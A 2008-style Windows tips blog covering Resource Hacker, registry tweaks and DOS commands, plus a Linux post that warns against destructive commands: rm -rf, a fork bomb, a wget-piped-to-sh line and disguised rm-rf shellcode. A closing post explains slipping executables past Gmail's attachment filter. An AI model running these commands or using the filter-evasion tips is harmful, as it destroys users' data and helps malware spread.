
Blog


    9/30/2008

    Anti-Hacker Expert 2008 1.2

    Anti-Hacker Expert includes more than 12000 hacker program and trojan signatures. It uses several kinds of scan to check your computer quickly and reliably.
    Use the port scan to find ports opened by hacker programs and trojans on your PC, and delete the hacker programs and trojans. The registry scan is a high-speed scan for autorun entries. It scans the system registry using known trojan filenames. If a trojan is identified by the registry scan, it will be removed from disk. The memory scan checks all system processes; if a hacker program or trojan is found, it is killed within a minute and its related files are deleted. The disk scan also removes unwanted hacker program and trojan files from your hard disks. This is the most important search method. You can select whether you want to scan whole drives or specified folders. The firewall runs as a background guard that watches for active hacker programs and trojans while you are working on your PC. New editions that detect more hacker programs and trojans are published regularly and can be obtained through the Internet online update.
    pass: Hazzard@SW


    Replace Windows Pics With Your Photo

    You can replace the Windows image in System Properties with your own image.
    (1) For that, first u have to download ResHack (search for it in Google) from the net; it is around 120KB software.
    (2) Now open Resource Hacker and then open the file C:\windows\system32\sysdm.cpl
    (3) Then in the images go into (1->1033), replace the image with your image (118x113 size), save the file as C:\windows\system32\sysdm.cpl, replacing the existing one,
    and then restart your pc.
    (4) You will find your pic in the System Properties pane.
    (5) Have A Nice Day
    9/19/2008

    Display at startup

    Type the lines below in Notepad and save the file as Anyname.reg. Double-click the file, restart the system, and see the difference.

    Windows Registry Editor Version 5.00

    ; Logon banner (caption and text) shown before the sign-in prompt
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
    "dontdisplaylastusername"=dword:00000000
    "legalnoticecaption"="Hai!!! Have a Nice Day"
    "legalnoticetext"="Hai !! Balagurunath!! You are Blessed and have born to Win"
    "shutdownwithoutlogon"=dword:00000001
    "undockwithoutlogon"=dword:00000001


    9/7/2008

    How to get the bios info from windows registry

    Go to the registry and navigate to the values given below:
    HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate
    HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
    HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosDate
    HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion
    Some information about your BIOS may be in the keys above. Do not
    change these values. They are for reference only.

    You can get more info using the wmic command. Open cmd and type:
    wmic bios get /format:list
    wmic supports many other aliases also; for full list see wmic/

    Folder lock without any software

    cls
    @ECHO OFF
    title Folder Locker
    REM Locking only renames the folder to the Recycle Bin CLSID; the files are not encrypted.
    if EXIST "recyclebin.{645FF040-5081-101B-9F08-00AA002F954E}" goto UNLOCK
    if NOT EXIST Locker goto MDLOCKER
    :CONFIRM
    echo Are you sure u want to Lock the folder(Y/N)
    REM Clear the variable first so an empty answer is not treated as the previous one.
    set "cho="
    set /p "cho=>"
    REM /I compares case-insensitively; the quotes keep empty input from breaking IF.
    if /I "%cho%"=="Y" goto LOCK
    if /I "%cho%"=="N" goto END
    echo Invalid choice.
    goto CONFIRM
    :LOCK
    ren Locker "recyclebin.{645FF040-5081-101B-9F08-00AA002F954E}"
    echo Folder locked
    goto END
    :UNLOCK
    echo Enter password to Unlock folder
    set "pass="
    set /p "pass=>"
    REM The password is kept in plain text in this file; quotes allow spaces in it.
    if NOT "%pass%"=="type your password here" goto FAIL
    ren "recyclebin.{645FF040-5081-101B-9F08-00AA002F954E}" Locker
    echo Folder Unlocked successfully
    goto END
    :FAIL
    echo Invalid password
    goto END
    :MDLOCKER
    md Locker
    echo Locker created successfully
    goto END
    :END

    1. Now paste it in Notepad.
    2. Change the "type your password here" to your password (marked as bold in the above posted matter).
    3. Save it as a batch file (with extension .bat). Any name will do.
    4. Now you see a batch file. Double click it to create a folder locker.
    5. A new folder named Locker would be formed at the same location.
    6. Now bring all the files you want to hide into the Locker folder.
    7. Now double click the batch file to lock the folder named Locker.
    8. If you want to unlock your files, double click the batch file again and you would be prompted for the password. Enter the password and enjoy access to the folder.

    Res hack

    Resource hacker-Help




                   !!! WARNING !!!

           Playing with system files using resource hacker can be
              Dangerous for your system and it can make your
                               system not working.

                         So use it at your own risk!



    First of all hi to all "cynides"

    So many members hv asked me a lot of questions about Resource Hacker, like:

    => How to replace existing Resources ( Bitmaps, AVI, Icons, etc.) in a file?
    => How to add ur own resources?
    => How to change Menus/ Strings?

    and so on...

    I was working on this post for the last 1 week.

    So here I'll try to cover all such questions and many other tips-n-tricks.
    So here we go.....

    NOTE: I hv divided this tutorial in 2 parts:

    PART1 : BASIC INFORMATION
    PART2 : ADVANCED INFORMATION

    Basic part contains Basic details, like viewing/replacing resources, etc.
    Advanced part covers some advance information which is described for geeks. Like Adding ur own resources, using scripts with resource hacker, etc.

                                  
         PART1 : BASIC INFORMATION

    What is Resource Hacker:

    Resource Hacker is a Free s/w to edit 32-bit windows files (DLL, EXE, CPL, and many other). U can add/delete/view/rename/modify existing resources in a file using this gr8 piece of s/w.

    Download Link:

    U can d/l Resource Hacker from h**p://delphi.icm.edu.pl/ftp/tools/ResHack.zip
    U don't need to install it, simply extract the files and run the s/w. It also doesnt make any entry in Registry!

    Using Resource Hacker:

    When u open a file in Resource Hacker, it shows various directories in left-side pane, like:

    AVI
    Cursor
    Bitmap
    Icon
    Menu
    Dialog
    String Table
    Accelerators
    Version Info

    and so on...
    These directories vary from file to file!

    Following is a small description of these directories:

    AVI : This directory contains AVI files.
    Cursor : This directory contains Cursor files.
    Bitmap : This directory contains Bitmaps.
    Icon : This directory contains Icons.
    Menu : This directory contains various Menus.
    Dialog : This directory contains various Dialog boxes.
    String Table : This directory contains various Strings.
    Accelerators : This directory contains Shortcut keys.
    Version Info : This directory contains version information of the file.

    Viewing Resources:

    U can view any resource embedded in the file. Simply expand the directory and click on the name of the resource.
    Actually each resource contains 3 parts:

    Resource Type
    Resource Name
    Resource Language


    Resource Type : It indicates that the resource is an AVI/Bitmap/Menu/Cursor/Icon/String/etc.
    Resource Name : It describes the name of a resource, no 2 resources can hv the same name.
    Resource Language : Its the language used in the file. For ENGLISH its 1033.
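
The Type -> Name -> Language tree that Resource Hacker shows is the three-level resource directory stored in a PE file's .rsrc section. The following is an added example, not part of the original tutorial: it walks a raw .rsrc section and diffs two versions of it, which is how an edited system file can be compared against a known-good copy. The helper names and the sample bytes from build_sample() are constructed for illustration.

```python
import struct

SUBDIR = 0x80000000  # high bit: offset is a subdirectory / name field is a string
# A few predefined type IDs from the PE format (RT_* constants).
RT_NAMES = {1: "Cursor", 2: "Bitmap", 3: "Icon", 4: "Menu", 5: "Dialog",
            6: "String Table", 9: "Accelerators", 16: "Version Info"}


def _label(rsrc, ident):
    """Decode an entry's name field: integer ID or length-prefixed UTF-16 string."""
    if ident & SUBDIR:
        off = ident & 0x7FFFFFFF
        (length,) = struct.unpack_from("<H", rsrc, off)
        return rsrc[off + 2:off + 2 + 2 * length].decode("utf-16-le")
    return ident


def _entries(rsrc, dir_off):
    """Yield (label, offset_field) for every entry of one resource directory."""
    named, ids = struct.unpack_from("<HH", rsrc, dir_off + 12)
    for i in range(named + ids):
        ident, offset = struct.unpack_from("<II", rsrc, dir_off + 16 + 8 * i)
        yield _label(rsrc, ident), offset


def walk_resources(rsrc):
    """Return [(type, name, language, data_rva, size)] for a raw .rsrc section."""
    found = []
    try:
        for rtype, off1 in _entries(rsrc, 0):
            if not off1 & SUBDIR:
                continue  # malformed: the type level must point to a directory
            for name, off2 in _entries(rsrc, off1 & 0x7FFFFFFF):
                if not off2 & SUBDIR:
                    continue  # malformed: the name level must point to a directory
                for lang, off3 in _entries(rsrc, off2 & 0x7FFFFFFF):
                    if off3 & SUBDIR:
                        continue  # only three levels are defined
                    rva, size = struct.unpack_from("<II", rsrc, off3)
                    found.append((RT_NAMES.get(rtype, rtype), name, lang, rva, size))
    except struct.error as exc:
        raise ValueError("truncated or malformed resource directory") from exc
    return found


def diff_resources(before, after):
    """Report resources added, removed or resized between two .rsrc sections.

    A same-size replacement is not visible here; hash the resource data for that.
    """
    old = {(t, n, l): size for t, n, l, _, size in walk_resources(before)}
    new = {(t, n, l): size for t, n, l, _, size in walk_resources(after)}
    return {
        "added": sorted(new.keys() - old.keys(), key=str),
        "removed": sorted(old.keys() - new.keys(), key=str),
        "resized": sorted((k for k in old.keys() & new.keys() if old[k] != new[k]), key=str),
    }


def _dir(named, ids, entries):
    """Pack one directory header plus its entries (used only to build the sample)."""
    out = struct.pack("<IIHHHH", 0, 0, 0, 0, named, ids)
    for ident, off in entries:
        out += struct.pack("<II", ident, off)
    return out


def build_sample(bitmap_size=13398):
    """Constructed .rsrc bytes holding AVI -> 144 -> 1033 and Bitmap -> 131 -> 1033."""
    blob = _dir(1, 1, [(SUBDIR | 160, SUBDIR | 32), (2, SUBDIR | 56)])  # root: types
    blob += _dir(0, 1, [(144, SUBDIR | 80)])    # type "AVI"  -> name 144
    blob += _dir(0, 1, [(131, SUBDIR | 104)])   # type Bitmap -> name 131
    blob += _dir(0, 1, [(1033, 128)])           # name 144 -> language 1033
    blob += _dir(0, 1, [(1033, 144)])           # name 131 -> language 1033
    blob += struct.pack("<IIII", 0x5000, 9000, 0, 0)         # AVI data entry
    blob += struct.pack("<IIII", 0x8000, bitmap_size, 0, 0)  # Bitmap data entry
    blob += struct.pack("<H", 3) + "AVI".encode("utf-16-le")  # string type name
    return blob


if __name__ == "__main__":
    for row in walk_resources(build_sample()):
        print(row)
    print(diff_resources(build_sample(), build_sample(bitmap_size=40054)))
```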

    Changing the Resources:

    => For Icon/Cursor/Bitmap:

    1) Select the resource ( e.g. Bitmap -> 131 -> 1033 ).
    2) Click on Action -> Replace Icon/Cursor/Bitmap....
    3) It'll open a new window, click on Open file with new
        Icon/Cursor/Bitmap button.
    4) Select the desired resource in the OPEN dialog box and
        click on Open button and then Replace.

    => For other resources like AVI:

    Its a little bit different.

    1.) Click on Action -> Replace Other Resource....
    2.) It'll open a new window, click on Open file with new resource button.
    3.) Select the file and click on Open button.
    4.) Now u hv to give the required information for this resource,
         which I mentioned. Its a little bit different.

    Resource Type
    Resource Name
    Resource Language


    In type give the type of resource, e.g. if u r replacing AVI file then give the type as AVI.
    In name give the exact name of the existing resource which u want to replace with this new one.
    In language give 1033 for English.

    5) And finally click on Replace button.

    => For Menus/Strings/Dialogs:

    To change String/Menu/Dialog boxes, Select the desired resource, e.g., String Table -> 4 -> 1033, and make ur changes and then click on Compile Script button. It'll compile the script and will give ERROR if something goes wrong so that u can correct the problem!

    Adding ur own Resources:

    Adding new Bitmaps/Icons/Cursors/AVIs:


    1) Click on Action -> Add a new Resource....
    2) Click on Open file with new resource button.
    3) Select the desired resource and click on Open button.
    4) Give Resource Type/Name/Language.
         (Remember: Resource Name should be different than the
         existing resources.)
    5) Click on Add Resource button.

    Adding new Menu-items:

    U can also add ur own Menu-items, like u can add extra menu (e.g., ur name) in Desktop Context Menu, etc.

    1.) Goto desired menu, e.g., Menu -> 215 -> 1033, and add a
         line anywhere inside POPUP "" or something like that in
         following format:

    MENUITEM "ur_desired_string", 12345, MFT_STRING, MFS_GRAYED | MFS_DEFAULT

    Here:

    "ur_desired_string" is the text which will be displayed on screen.
    12345 is the identifier, which must be different than other menuitems.
    MFT_STRING describes that its a Menuitem with some text.
    MFS_GRAYED disables our menuitem. U can also change it to MFS_ENABLED to enable it.
    MFS_HILITE automatically select our menuitem. u can ignore it.
    MFS_DEFAULT set our menuitem BOLD. u can also ignore it.

    Actually u can only give MENUITEM "ur_desired_string", 12345 and Resource Hacker will automatically add other parts.

    Adding Newly added Resources in Dialog Boxes:

    Once u hv added ur own Icons/Bitmaps/AVIs, u may want to add them in dialog box so that they can be displayed when we open some dialog box (like RUN, Progress Dialog box, etc.).

    1.) Goto the desired dialog box, in which u want to add ur own
          resource, e.g., Dialog -> 1020 -> 1033.
    2.) Right-click on the dialog box and select Insert Control option.
    3.) It'll open a new window, where u'll see many controls,
         like BITMAP, LABEL, ICON, BUTTON, SysAnimate32 (for AVIs), etc.
    4.) Simply click on the desired control, like to use ur own added
         Bitmap click on the BITMAP control or to use ur own added AVI
         click on SysAnimate32 control. U can also add Date/Time control
         by clicking on SysDateTimePick32 control.
    5.) Don't forget to fill the Caption entry. Actually we hv to enter
          the resource name in Caption so that our added resource can
          be displayed on that place! e.g., if u hv added a Bitmap and
          gave it name as 401, then give 401 in Caption.

    PS: For AVI Control ( SysAnimate32 ), u hv to add # before the name in Caption. e.g., if the AVI name 144, then put #144 in Caption

    6.) Finally click on OK button & Compile the script.
    7.) U can change its position on the dialog box by simply dragging
          it to ur desired position.

    Using Scripts in Resource Hacker:

    We can also use Resource Hacker from Command line w/o going thru its GUI and also can automate many repetitive tasks to save our time.

    U can use the scripts in 2 forms:

    1.) Single command
    2.) Multiple commands

    1.) Single Command:

    Some useful commands with their format r as follows:

    -add ExeFileName, ResultingFileName, ResourceAddress, ResourceType, ResourceName,
    -addskip ExeFileName, ResultingFileName, ResourceAddress, ResourceType, ResourceName,
    -addoverwrite ExeFileName, ResultingFileName, ResourceAddress, ResourceType, ResourceName,
    -modify ExeFileName, ResultingFileName, ResourceAddress, ResourceType, ResourceName,
    -extract ExeFileName, ResourceAddress, ResourceType, ResourceName,
    -delete ExeFileName, ResultingFileName, ResourceType, ResourceName


    Here:

    ExeFileName : The original file which we want to edit in Resource Hacker
    ResultingFileName : The name which we want to give when we save the file.
    ResourceAddress : The resource address (like Bitmap location on our HDD).
    ResourceType : The resource type (like Bitmap, AVI, etc.).
    ResourceName : Resource name (like 131, 1020, etc.).

    EX:- ResHacker.exe -addoverwrite explorer.exe, explorer1.exe, MyImage.bmp , bitmap, 143,

    2.) Multiple commands

    To use script first u hv to create a script file in notepad and then give following command:

    ResHacker.exe -script ScriptFileName

    Here: ScriptFileName is the name of the script file which u made in notepad.

    Format of a script file:-

    [FILENAMES]
    Exe=
    SaveAs=
    Log=

    [COMMANDS]
    -addoverwrite ResourceAddress, ResourceType, ResourceName


    Here:

    EXE= is the original file location
    SaveAs= is the saved file location
    Log= is the LOG file location which will store the log of the process

    In [COMMANDS] section, we give the commands which we want to execute.

    U can omit the LOG entry, then Resource Hacker will automatically create a LOG file named "ResHacker.log".

    Thats all for now guys! I hv tried to cover all points related to Resource Hacker!
    If u hv further queries, pls ask here. I'll try my BEST to answer them.


    njoy...!!

    Run shortcuts

    Command Prompt
    -------------------------------------------------------------------
    ANSI.SYS - Defines functions that change display graphics, control cursor movement, and reassign keys.
    APPEND - Causes MS-DOS to look in other directories when editing a file or running a command.
    ARP - Displays, adds, and removes arp information from network devices.
    ASSIGN - Assign a drive letter to an alternate letter.
    ASSOC - View the file associations.
    AT - Schedule a time to execute commands or programs.
    ATMADM - Lists connections and addresses seen by Windows ATM call manager.
    ATTRIB - Display and change file attributes.

    BATCH - Recovery console command that executes a series of commands in a file.
    BACKUP - Enables users to backup their data on their computer.
    BOOTCFG - Recovery console command that allows a user to view, modify, and rebuild the boot.ini
    BREAK - Enable / disable CTRL + C feature.

    CACLS - View and modify file ACL's.
    CALL - Calls a batch file from another batch file.
    CD - Changes directories.
    CHCP - Supplement the International keyboard and character set information.
    CHDIR - Changes directories.
    CHKDSK - Check the hard disk drive running FAT for errors.
    CHKNTFS - Check the hard disk drive running NTFS for errors.
    CHOICE - Specify a listing of multiple options within a batch file.
    CLS - Clears the screen.
    CMD - Opens the command interpreter.
    COLOR - Easily change the foreground and background color of the MS-DOS window.
    COMMAND - Opens the command interpreter.
    COMP - Compares files.
    COMPACT - Compresses and uncompress files.
    CONTROL - Open control panel icons from the MS-DOS prompt.
    CONVERT - Convert FAT to NTFS.
    COPY - Copy one or more files to an alternate location.
    CTTY - Change the computers input/output devices.

    DATE - View or change the systems date.
    DEBUG - Debug utility to create assembly programs to modify hardware settings.
    DEFRAG - Re-arrange the hard disk drive to help with loading programs.
    DEL - Deletes one or more files.
    DELETE - Recovery console command that deletes a file.
    DELTREE - Deletes one or more files and/or directories.
    DIR - List the contents of one or more directory.
    DISABLE - Recovery console command that disables Windows system services or drivers.
    DISKCOMP - Compare a disk with another disk.
    DISKPART - used to delete and create partitions.
    DISKCOPY - Copy the contents of one disk and place them on another disk.
    DOSKEY - Command to view and execute commands that have been run in the past.
    DOSSHELL - A GUI to help with early MS-DOS users.
    DRIVPARM - Enables overwrite of original device drivers.

    ECHO - Displays messages and enables and disables echo.
    EDIT - View and edit files.
    EDLIN - View and edit files.
    EMM386 - Load extended Memory Manager.
    ENABLE - Recovery console command to enable a disable service or driver.
    ENDLOCAL - Stops the localization of the environment changes enabled by the setlocal command.
    ERASE - Erase files from computer.
    EXIT - Exit from the command interpreter.
    EXPAND - Expand a M*cro$oft Windows file back to it's original format.
    EXTRACT - Extract files from the M*cro$oft Windows cabinets.

    FASTHELP - Displays a listing of MS-DOS commands and information about them.
    FC - Compare files.
    FDISK - Utility used to create partitions on the hard disk drive.
    FIND - Search for text within a file.
    FINDSTR - Searches for a string of text within a file.
    FIXBOOT - Writes a new boot sector.
    FIXMBR - Writes a new boot record to a disk drive.
    FOR - Boolean used in batch files.
    FORMAT - Command to erase and prepare a disk drive.
    FTP - Command to connect and operate on a FTP server.
    FTYPE - Displays or modifies file types used in file extension associations.

    GOTO - Moves a batch file to a specific label or location.
    GRAFTABL - Show extended characters in graphics mode.

    HELP - Display a listing of commands and brief explanation.
    HOSTNAME - Display the hostname of the machine.

    IF - Allows for batch files to perform conditional processing.
    IFSHLP.SYS - 32-bit file manager.
    IPCONFIG - Network command to view network adapter settings and assigned values.

    KEYB - Change layout of keyboard.

    LABEL - Change the label of a disk drive.
    LH - Load a device driver in to high memory.
    LISTSVC - Recovery console command that displays the services and drivers.
    LOADFIX - Load a program above the first 64k.
    LOADHIGH - Load a device driver in to high memory.
    LOCK - Lock the hard disk drive.
    LOGON - Recovery console command to list installations and enable administrator login.

    MAP - Displays the device name of a drive.
    MD - Command to create a new directory.
    MEM - Display memory on system.
    MKDIR - Command to create a new directory.
    MODE - Modify the port or display settings.
    MORE - Display one page at a time.
    MOVE - Move one or more files from one directory to another directory.
    MSAV - Early M*cro$oft Virus scanner.
    MSBACKUP - MS-DOS application that enables users to backup their data on their computer.
    MSD - Diagnostics utility.
    MSCDEX - Utility used to load and provide access to the CD-ROM.
    MWBACKUP - MS-DOS application that enables users to backup their data on their computer.

    NBTSTAT - Displays protocol statistics and current TCP/IP connections using NBT
    NET - Update, fix, or view the network or network settings
    NETSH - Configure dynamic and static network information from MS-DOS.
    NETSTAT - Display the TCP/IP network protocol statistics and information.
    NLSFUNC - Load country specific information.
    NSLOOKUP - Look up an IP address of a domain or host on a network.

    PATH - View and modify the computers path location.
    PATHPING - View and locate locations of network latency.
    PAUSE - Command used in batch files to stop the processing of a command.
    PING - Test / send information to another network computer or network device.
    POPD - Changes to the directory or network path stored by the pushd command.
    POWER - Conserve power with computer portables.
    PRINT - Prints data to a printer port.
    PROMPT - View and change the MS-DOS prompt.
    PUSHD - Stores a directory or network path in memory so it can be returned to at any time.

    QBASIC - Open the QBasic.

    RD - Removes an empty directory.
    REN - Renames a file or directory.
    RENAME - Renames a file or directory.
    RMDIR - Removes an empty directory.
    ROUTE - View and configure windows network route tables.
    RUNAS - Enables a user to execute a program on another computer.

    SCANDISK - Run the scandisk utility.
    SCANREG - Scan registry and recover registry from errors.
    SET - Change one variable or string to another.
    SETLOCAL - Enables local environments to be changed without affecting anything else.
    SETVER - Change MS-DOS version to trick older MS-DOS programs.
    SFC - Scans and replaces any M*cro$oft Windows file on the computer and replaces any changed file with the correct version
    SHARE - Installs support for file sharing and locking capabilities.
    SHIFT - Changes the position of replaceable parameters in a batch program.
    SHUTDOWN - Shutdown the computer from the MS-DOS prompt.
    SMARTDRV - Create a disk cache in conventional memory or extended memory.
    SORT - Sorts the input and displays the output to the screen.
    START - Start a separate window in Windows from the MS-DOS prompt.
    SUBST - Substitute a folder on your computer for another drive letter.
    SWITCHES - Remove add functions from MS-DOS.
    SYS - Transfer system files to disk drive.
    SYSTEMINFO - Displays complete system information for M*cro$oft Windows XP Professional computers.
    SYSTEMROOT - The systemroot command is a recovery console command that sets the current directory as the system root directory.

    TELNET - Telnet to another computer / device from the prompt.
    TIME - View or modify the system time.
    TITLE - Change the title of their MS-DOS window.
    TRACERT - Visually view a network packets route across a network.
    TREE - View a visual tree of the hard disk drive.
    TYPE - Display the contents of a file.

    UNDELETE - Undelete a file that has been deleted.
    UNFORMAT - Unformat a hard disk drive.
    UNLOCK - Unlock a disk drive.

    VER - Display the version information.
    VERIFY - Enables or disables the feature to determine if files have been written properly.
    VOL - Displays the volume information about the designated drive.

    XCOPY - Copy multiple files, directories, and/or drives from one location to another.

    Malicious Commands Ubuntu / Linux Bad / Harmful / Risky Commands

    As requested by some, for the education of our users, here are some common examples of dangerous commands that should raise a bright red flag. Again, these are extremely dangerous and should not be attempted on a computer that has any physical connection to valuable data -- many of them will even cause damage from a LiveCD environment.

    Again, DANGEROUS COMMANDS -- look but DO NOT RUN.

    Also, this is far from an exhaustive list, but should give you some clues as to what kind of things people may try to trick you into doing. Remember this can always be disguised in an obfuscated command or as a part of a long procedure, so the bottom line is take caution for yourself when something just doesn't "feel right".

    Delete all files, delete current directory, and delete visible files in current directory. It's quite obvious why these commands can be dangerous to execute.
    Code:
    rm -rf /
    rm -rf .
    rm -rf *
    Reformat: Data on device mentioned after the mkfs command will be destroyed and replaced with a blank filesystem.
    Code:
    mkfs
    mkfs.ext3
    mkfs.anything
    Block device manipulation: Causes raw data to be written to a block device. Often times this will clobber the filesystem and cause total loss of data:
    Code:
    any_command > /dev/sda
    dd if=something of=/dev/sda
    Forkbomb: Executes a huge number of processes until system freezes, forcing you to do a hard reset which may cause corruption, data damage, or other awful fates.
    In Bourne-ish shells, like Bash: (This thing looks really intriguing and provokes curiosity.)
    Code:
    :(){:|:&};:
    In Perl
    Code:
    fork while fork
    Tarbomb: Someone asks you to extract a tar archive into an existing directory. This tar archive can be crafted to explode into a million files, or inject files into the system by guessing filenames. You should make a habit of decompressing tars inside a cleanly made directory.

    Decompression bomb: Someone asks you to extract an archive which appears to be a small download. In reality it's highly compressed data and will inflate to hundreds of GB's, filling your hard drive. You should not touch data from an untrusted source.
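    One way to check an archive for both problems before extracting anything, as an added example that is not part of the original announcement. The function names, limits and sample archive are assumptions made for illustration; the sample is constructed in memory.

```python
import io
import tarfile
from pathlib import PurePosixPath


def audit_tar(fileobj, max_total_bytes=1 << 30, max_members=10_000):
    """Return a list of warnings for a tar archive without extracting it."""
    warnings, top_levels, total, count = [], set(), 0, 0
    with tarfile.open(fileobj=fileobj, mode="r:*") as tar:
        for member in tar:              # walks member headers; writes nothing to disk
            count += 1
            total += member.size        # uncompressed size declared in the header
            path = PurePosixPath(member.name)
            if path.is_absolute():
                warnings.append(f"absolute path: {member.name}")
            elif ".." in path.parts:
                warnings.append(f"escapes target dir: {member.name}")
            else:
                top_levels.add(path.parts[0] if path.parts else ".")
            if member.issym() or member.islnk():
                warnings.append(f"link {member.name} -> {member.linkname}")
            if member.isdev():
                warnings.append(f"device node: {member.name}")
            if count > max_members or total > max_total_bytes:
                warnings.append(f"too large: {count} members, {total} bytes so far")
                break                   # stop early instead of walking the whole bomb
    if len(top_levels) > 1:
        warnings.append(f"tarbomb: {len(top_levels)} top-level entries")
    return warnings


def build_sample():
    """Constructed archive: scattered top-level files plus one traversal entry."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name in ("README", "notes.txt", "../.bashrc"):
            data = b"x" * 200
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    buf.seek(0)
    return buf


if __name__ == "__main__":
    for line in audit_tar(build_sample(), max_total_bytes=500):
        print(line)
```

    Even when the audit comes back clean, extract only into a freshly created, empty directory.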

    Shellscript: Someone gives you the link to a shellscript to execute. This can contain any command he chooses -- benign or malevolent. Do not execute code from people you don't trust.
    Code:
    wget http://some_place/some_file
    sh ./some_file
    Code:
    wget http://some_place/some_file -O- | sh
    Compiling code: Someone gives you source code then tells you to compile it. It is easy to hide malicious code as a part of a large wad of source code, and source code gives the attacker a lot more creativity for disguising malicious payloads. Do not compile OR execute the compiled code unless the source is of some well-known application, obtained from a reputable site (e.g. SourceForge, the author's homepage, an Ubuntu address).

    A famous example of this surfaced on a mailing list disguised as a proof of concept sudo exploit claiming that if you run it, sudo grants you root without a shell. In it was this payload:
    Code:
    char esp[] __attribute__ ((section(".text"))) /* e.s.p
    release */
    = "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
    "\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"

    "\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
    "\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
    "\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"

    "\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
    "\x6e\x2f\x73\x68\x00\x2d\x63\x00"
    "cp -p /bin/sh /tmp/.beyond; chmod 4755
    /tmp/.beyond;";
    To the new or even lightly experienced computer user, this looks like the "hex code gibberish stuff" that is so typical of a safe proof-of-concept. However, this actually runs rm -rf ~ / & which will destroy your home directory as a regular user, or all files as root. If you could see this command in the hex string, then you don't need to be reading this announcement. Otherwise, remember that these things can come in very novel forms -- watch out.
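    A static look at that payload, as an added example that is not part of the original announcement: the sketch never executes the bytes. It first lists the readable strings, then applies one heuristic that is an assumption fitting this sample: a run of x86 `push imm32` instructions (opcode 0x68) builds a string on the stack, stored either as-is or bitwise inverted. The function names are hypothetical.

```python
import re

# Bytes copied from the listing above; the trailing text is the visible decoy.
PAYLOAD = (
    b"\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
    b"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
    b"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
    b"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
    b"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
    b"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
    b"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
    b"cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;"
)


def visible_strings(data, min_len=6):
    """What a `strings`-style pass shows: runs of printable ASCII."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, data)]


def hidden_pushed_strings(data):
    """Rebuild strings assembled on the stack by runs of `push imm32` (0x68).

    The last push lands at the lowest address, so operands are reversed
    before joining. Each candidate is tried as-is and bitwise inverted.
    """
    found = []
    for run in re.finditer(rb"(?:\x68.{4}){2,}", data, re.DOTALL):
        chunk = run.group()
        operands = [chunk[i + 1:i + 5] for i in range(0, len(chunk), 5)]
        stack = b"".join(reversed(operands))
        for label, raw in (("plain", stack),
                           ("not", bytes(b ^ 0xFF for b in stack))):
            text = raw.split(b"\x00", 1)[0]
            if len(text) >= 4 and all(0x20 <= b <= 0x7E for b in text):
                found.append((label, text.decode("ascii")))
    return found


if __name__ == "__main__":
    print("visible:", visible_strings(PAYLOAD))
    print("hidden :", hidden_pushed_strings(PAYLOAD))
```

    The readable strings show only the shell path and the decoy text; the command that actually gets passed to the shell appears only after the pushed operands are inverted.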


    Again, recall these are not at all comprehensive and you should not use this as a checklist to determine if a command is dangerous or not!

    For example, 30 seconds in Python yields something like this:
    Code:
    python -c 'import os; os.system("".join([chr(ord(i)-1) for i in "sn!.sg!+"]))'
    Where "sn!.sg!+" is simply rm -rf * shifted a character up. Of course this is a silly example -- I wouldn't expect anyone to be foolish enough to paste this monstrous thing into their terminal without suspecting something might be wrong.

    Get Youtube Video in FLV format at Firefox cache folder without download

    Watch a YouTube video in Firefox and you can pick up the FLV file of that video from Firefox's cache folder. There is no need to download the YouTube video from other websites.

    Here is the step by step process.

    1. Watch the full YouTube video in the Firefox browser.
    2. When you see the replay button on the YouTube video, don't close the Firefox browser.
    3. Go to the following folder: D:(or C:)\Documents and Settings\ADMIN (your Admin login)\Local Settings\Application Data\Mozilla\Firefox\Profiles (one by one),
    4. Click a single folder there and you will find a folder named "Cache". Click on it. You will find a lot of files of unknown type in this folder.
    5. Most probably the last file will be the YouTube video.
    6. Remember, the YouTube video is in FLV format in this folder, with an unknown name and type.
    7. You can arrange all files in this folder by size. The largest file should be the YouTube video.
    8. Copy that file, paste it on desktop
    9. Rename it with FLV extension, something like video1.flv.
    10. Play the video with FLV player.

    Send Out Executable Files Via Gmail

    As a security measure to prevent the intrusion of potential viruses, Gmail's policy does not allow users to send or receive executable files (files with the extension ".exe", ".dll", ".ocx" or ".bat"). If you try to send these files, Gmail will show you an error message: "This is an executable file. For security reasons, Gmail does not allow you to send this type of file." You might try to zip or compress the files into other formats such as ".zip", ".tar", ".tgz", ".taz", ".z" or ".gz". However, your Gmail account will bounce back your message. How do you send executable files with your Gmail account if you really need to do so? Of course the easiest way is to use another email service such as Yahoo to send your important executable files. However, if you are still set on using Gmail to send your executable files, there are a few ways you can try:
    1. You can rename your executable files from the "exe" extension to other formats such as "doc", "jpeg", etc. For instance, if your file name is happy.exe, just rename your file to happy.doc and send it over to the receivers. Once the receivers have received the files, they just need to change the extension back to the original file extension.
    2. The other way you can try is to upload your executable files to some free file hosting service such as DivShare or Rapidshare. Copy down the link and send it to the receivers. It's pretty straightforward.
    3. The last option you can try is to compress your executable file by using Winrar. Gmail doesn't scan files in the RAR format. You can send the file out without a problem. However, you must make sure your receivers can open the RAR files.

